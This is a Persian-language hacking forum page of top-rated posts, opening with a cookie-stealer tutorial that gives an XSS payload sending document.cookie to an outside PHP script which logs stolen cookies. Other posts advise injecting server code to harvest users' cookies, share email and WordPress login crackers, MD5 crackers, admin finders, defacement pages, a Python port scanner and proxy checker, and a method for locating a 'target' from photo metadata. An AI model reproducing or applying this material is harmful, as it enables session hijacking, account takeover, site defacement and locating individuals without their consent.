پرچمداران


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در ۱۹/۰۲/۱۱ در همه بخش ها

  1. 2 امتیاز
    با سلام خدمت شما دوست عزیز وقتی شما یوزر پس رو داری دیگه نیازی بع اتیلر کوکی نیس اما با این حال بنده با دانش اندکی که دارم یکم توضیح بدم در رابطه با کوکی استیلر اینو شما میتونی رو هر کاربری که پیج شمارو وا کنه اجرا کنی نکته :این اموزش فقط جنبه علمی اموزشی داره و نحوه استفاده از اون بر میگرده شخصیت فرد وبنده مسولیتی در قبال دزدیدن کوکی دیگران ندارم شما فقط نیازمند 3تا فایل هستید اولی پیج htmlکه به کاربر نشون میده دومی کد phpکه براتون کار دزدیدن کوکی رو برعهده داره و سومی که یک فایله که کار نگه داشتن کوکی های دزدی رو بر عهده داره قدم اول: ساخت صفحه دلخواهتون <html> <body> </body> </html> قدم دوم: تزریق کدتون که جایی اپلود کردین تا کوکی بهش ارسال بشه <script>location.href="http://192.168.1.10/steal/0utc4s7.php?cookie="%2bdocument.cookie</script> قدم سوم : ساخت کد پی اچ پی 0utc4s7-stealer.php <?php $cookie = $_GET['cookie']; $f = fopen("0utc4s7file.txt" , "a"); fwrite($f , $cookie); fclose($f); ?> وساختن فایلی به اسم.0utc4s7.txt وکار تمام است. *********************************************************** یا در حالت خیلی ساده و ساده تر شما فقط اگر خواستین میتونید به دوتای اینها نیاز داشته باشید یکی کد پی اچ پی و دیگری فایل نوت پد در سایه حق دوستان چون جاش اینجا نیس نمیتونم بیشتر از این توضیح بدم بنابه دلایل و قوانین انجمن که نمیتونیم قوانین کارگزاری رو زیر پا بزاریم با سپاس
  2. 2 امتیاز
    به نام خدا اسکریپت mailcat : یکی از بهترین اسکریپت هایی که برای کرک ایمیل در گیت هاب هم موجود هست تنها برتریش نسبت به بقیه اسکریپت ها قابلت سوییچ های متنوع و جالبیه که داره : سوییچ : -t , -v برای دانلود کلیک کنید دستور ها و آپشن ها : mailcat.py gmail.com combolist.txt 10 -o log.txt -v options >> -o/-outlog <file> : Output Logfile -v/-verbose : Verbose Mode
  3. 1 امتیاز
    سلام ی تاپیک برای اسکریپت های بدرد بخور نوشته شده ب پایتون ... واسکریپت هایی ک خودتون نوشتین امیدوارم تاپیک خوبی بشه اسپم ممنوع
  4. 1 امتیاز
    با لينوكس كار كردم استاد ري استارتم كردم حالت اخرم جواب نميده امتحان كردم
  5. 1 امتیاز
    به نام خدا یکی از تک دیفیس های دیگه که در گیت هاب هم موجود هست index.html
  6. 1 امتیاز
    به نام خدا مجموعه کالکشن دیفیس هایی که از گیت هاب گرفتم index.html index2.html index3.html index4.html index5.html index6.html index7.html
  7. 1 امتیاز
    با سلام دوست عزیز بنده میتونم هر کمکی که بخواهید در رابطه با لینوکس بگم براتون اما یک نصیحت براتون دارم و اون هم این هس که شما وتمامی دوستانی که میخوان لینوکس رو یاد بگیرن نباید مستقیم به لینوکس کوچ کنند چون بنابه دلایلی به دردسر میوفتن و براشون یکم اعذاب اور خواهد شد کار باهاش در رابطه با افزودن کپی شماباید با ناتیلوس اکشن کار کرده باشید اشنایی داشته باشید تا بتونم بگم چطور اینو اضافه کنید و یکم براتون سخت خواهد شد اما مطمعن هستم بعد از یکبار ریستارت درست میشه اگر نشد اونو بحالت کامندی بالا بیارید منظورم سیستم عامل هست بعد از اینکه رو حالت کامندی بالا اومد دستور startx رو وارد کنید و اینتر رو بزنید حتما درست میشه و حتما یک بار دیگه اپدیت کنید تا کاملا خوب استیبل شه رو سیستمتون یحتمل یکی دوتا فایل از جا افتادن و ناقص هستن در سایه حق
  8. 1 امتیاز
    با سلام دوست عزیز کلید های ترگیبی ALT+CTRL+ARROW منظور همان همزمان بزنی جهت تصویر تغیر میکنه در سایه حق
  9. 1 امتیاز
    شاید منظور من رو اشتباه متوجه شدین. لاگینی در کار نیست. فرض کنید که مثلا من به لینک http://google.com دسترسی کامل دارم.(که این لینک نیاز به لاگین نداره.) حالا میخوام یک کاری کنم که هر کی به این لینک وارد شد، من کوکیش رو ببینم. منظورم من هم از کوکی این کوکی هست 👇
  10. 1 امتیاز
    این واقعا عجیب ترین هدفی بوده که تو بحث هکینگ دیدم ولی شما میتونید وارد قسمت کدنویسی صفحه لاگین بشید صفحه ای رو که بعد از احراز هویت شدن ریدایرکت میشه رو پیدا کنید و وارد کدهای سمت سرور اون صفحه بشید و یک تیکه کد ساده بهش اضافه کنید که کوکی تمام کاربرا یا با یک شرط که اون یوزرنیم رومشخص میکنه رو بگیرید و کوکیش رو بردارید و تا زمانی که دکمه خروج رو نمیزنه و سشن منقضی نشه میتونید ازش استفاده کنید.
  11. 1 امتیاز
    خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.)
  12. 1 امتیاز
    سلام متوجه دلیل اینکار شما نمیشم وقتی دسترسی کامل دارید و میتونید با یوزرنیم پسورد قربانی لاگین بشید دیگه گرفتن کوکی اون شخص چه سودی برای شما داره ؟
  13. 1 امتیاز
    خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟
  14. 1 امتیاز
    به نام خدا اسکریپت Hash Buste که یکی از بهترین اسکریپت هایی هست که تا به حال استفاده کردم که حتی نوع هش هم به شما میگه : برای دانلود کلیک کنید دستور و آپشن استفاده : Usage: buster -s <hash>
  15. 1 امتیاز
    به نام خدا سلام دوستان و مدیران عزیز اسکریپتی که معرفی میکنم یکی از بهترین اسکریپت ها برای گرفتن پراکسی های آنلاین در شبکه هست که فوق العاده این اسکریپت کاربرد داره و این که به شما میگه کدام پراکسی در سطح لول بالاتر و مدت زمان انلاینی بیشتری داره ! لینک اسکن = Scan Link fetch-some-proxies.zip
  16. 1 امتیاز
    In The Name Of God سلام خدمت دوستان عزیز امروز با آموزش پیدا کردن موقعیت مکانی تارگت از طریق عکس آپلود شده در خدمت شما هستم ! در این آموزش ما با ابزار exiftool آشنا خواهیم شد ! دستور نصب این ابزار در سیستم عامل لینوکس یا کالی لینوکس! apt-get install exiftool آموزش استفاده از ابزار : بعد از نصب کافیه در ترمینال تایپ کنید : exiftool عکس مورد نظر
  17. 1 امتیاز
    In The Name Of God با سلام خدمت دوستان و مدیران عزیز : اسکریپتی که قرار میدم اسکریپت پورت اسکنر هست و فوق العاده ساده و کاربردی و کم حجم به زبان پایتون هست ! تمام پورت های باز یک سایت فقط با وارد کردن ادرس سایت به شما نشون میده ! (البته اینم اضافه کنم نمونه کامل این اسکریپت میشه ابزار قوی انمپ که خب گفتم این هم بزارم برای تازه وارد ها بد نیست) #!/usr/bin/env python import socket import subprocess import sys from datetime import datetime # Clear the screen subprocess.call('clear', shell=True) # Ask for input remoteServer = raw_input("Enter a remote host to scan: ") remoteServerIP = socket.gethostbyname(remoteServer) # Print a nice banner with information on which host we are about to scan print "-" * 60 print "Please wait, scanning remote host", remoteServerIP print "-" * 60 # Check what time the scan started t1 = datetime.now() # Using the range function to specify ports (here it will scans all ports between 1 and 1024) # We also put in some error handling for catching errors try: for port in range(1,1025): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteServerIP, port)) if result == 0: print "Port {}: Open".format(port) sock.close() except KeyboardInterrupt: print "You pressed Ctrl+C" sys.exit() except socket.gaierror: print 'Hostname could not be resolved. Exiting' sys.exit() except socket.error: print "Couldn't connect to server" sys.exit() # Checking the time again t2 = datetime.now() # Calculates the difference of time, to see how long it took to run the script total = t2 - t1 # Printing the information to screen print 'Scanning Completed in: ', total اگر استقبال شد اسکریپت های اسکن پشرفته تری میزارم و اگر جایی از کد نیاز به توضیح داشت درخدمتم !
  18. 1 امتیاز
    In The Name Of God اسکریپت کرک پنل وردپرس که خیلی سریعتر از بقیه اسکریپت ها عمل میکنه ! لینک اسکن = Scan Link wp.py
  19. 1 امتیاز
    In The Name Of God اسکریپت پروکسی چکر به زبان پایتون و یکی از ساده ترین اسکریپت های موجود هست باز هم اگر جایی نیاز به توضیح داشت بپرسید در خدمتم دوستان ! import requests import bs4 import time from threading import Thread from Queue import Queue import sys def proxy_check(proxy): try: proxy = proxy.rstrip() proxy_judge = "http://www.proxyjudge.info/" # any proxy judge can go here proxyy={"http": "http://"+proxy} r = requests.get(proxy_judge,proxies= proxyy,timeout=10) soup = bs4.BeautifulSoup(r.content,"html.parser") data = soup.find_all("body") for item in data: #Low anonymity if "HTTP_X_FORWARDED_FOR" in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text : if("L" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Low Alive" time.sleep(5.5) #Medium anonymity elif "HTTP_X_FORWARDED_FOR = unknown" in item.text: if("M" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Medium Alive" time.sleep(5.5) # High anonymity elif "HTTP_X_FORWARDED_FOR" not in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text and "REMOTE_ADDR" in item.text : if("H" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " High Alive" time.sleep(5.5) else: time.sleep(5.5) except requests.exceptions.Timeout: time.sleep(.5) #print str(proxy) + " Dead" except: time.sleep(.5) #print str(proxy) + " Dead" time.sleep(.5) def get_proxy(i,q): #print "Starting thread [" + str(i)+"]\n" time.sleep(5) while True: proxy = q.get() # get proxy proxy_check(proxy) q.task_done() if(len(sys.argv) < 4): print("\n\nUsage: programe.py proxy_list.txt output_proxies.txt LMH \n\nType\n L = Low\n M = Med\n H = High\n") else: num_threads = 300 q_queue = Queue() for i in range(num_threads): # number of threads to spin up worker = Thread(target=get_proxy, args=(i,q_queue,)) worker.setDaemon(True) worker.start() with open(sys.argv[1]) as fp: for line in fp: q_queue.put(line) # put list in queue q_queue.join() # wehen queue is empty exit print 'Finished' این هم کل دستورات این اسکریپت و آپشن ها و نحوه فراخوانیش :‌ Usage: programe.py proxy_list.txt output_proxies.txt LMH Type L = Low M = Med H = High
  20. 1 امتیاز
    In The Name Of God ممنون دوستان عزیز خب اینبار یکم تخصصی ترش میکنیم اسکریپت و از گیت هاب میخوام بهتون یه اسکریپت جالب معرفی کنم به نام نت اسکن که همراه با لینک دانلود لینک اسکنش هم قرار میدم لطفا قبل از استفاده فایل درباره من حتما مطالعه کنید ! لینک اسکن : Scan Link Nscan-master.zip
  21. 1 امتیاز
    سلام بدون داشتن اسیب پذیری در سایت مورد نظر (از جمله اسیب پذیری xss ) شما عملا نمیتونید کوکی های تارگت رو به سرقت ببرید چونکه کدها برای اینکار باید به نحوی به سایت تزریق بشه گرچه شاید باشند کسانی که اسکریپت یا روشهای کشف کرده باشند که بنده از اونها بی اطلاع هستم. ولی بصورت کلی سایتهای که امنیت قابل قبولی دارند در صورت دریافت اسکریپت برای دریافت کوکی اون اسکریپت و کدهای درون اون رو اسکیپ میکنن. پیشنهاد بنده به شما اینکه سایت مورد نظر رو بدقت بررسی کنید و تمام تستهای امنیتی که به اون مسلط هستید رو روی سایت انجام بدید شاید بتونید باگ و راهی برای نفوذ پیدا کنید اگر چه باز راهی برای نفوذ پیدا نکردید میتونید از سایت های روی سرور کمک بگیرید و اونا رو هم بررسی کنید.
  22. 1 امتیاز
    پروژه PyCk یک کالکسیون از ابزارهای بدرد بخور پایتون در زمینه هکینگ رو در خودش داره البته شاید زیاد ابزارها حرفه ای نباشن چون جنبه آموزشی هم دارن و برای کسایی که میخوان تست نفوذ با پایتون رو یادبگیرن به شدت توصیه میشه... پیشنهاد میکنم یه نگاهی بهش بندازین https://github.com/Naategh/PyCk
  23. 1 امتیاز
    به نام خدا اسکریپت اول : اسکریپت فول کرکر MD5 Md5 Cracker Full.py اسکریئت دوم : اسکریپت تبدیل پسورد به هش passtohash.py اسکریپت سوم : اسکریپت ادمین فایندر تخصصی admin.py اسکریپت چهارم : اسکریپت و کتاب خانه pip get-pip.py اگر مفید واقع شدند باز هم میزارم ! به امید دیدار !
  24. 1 امتیاز
    ی ماشین حساب ک خودم نوشتم ... دارای 4 عمل اصلی + لوگاریتم + توان + جذر + مساحت دایره بزودی کامل تر میشه mashinhesab.rar
  25. 1 امتیاز
    ادمین فایندر پایتون 2 عالیه admin finder.rar